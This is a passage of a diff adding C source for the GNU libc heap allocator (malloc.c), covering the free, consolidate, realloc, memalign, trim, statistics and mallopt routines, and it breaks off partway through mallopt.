+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
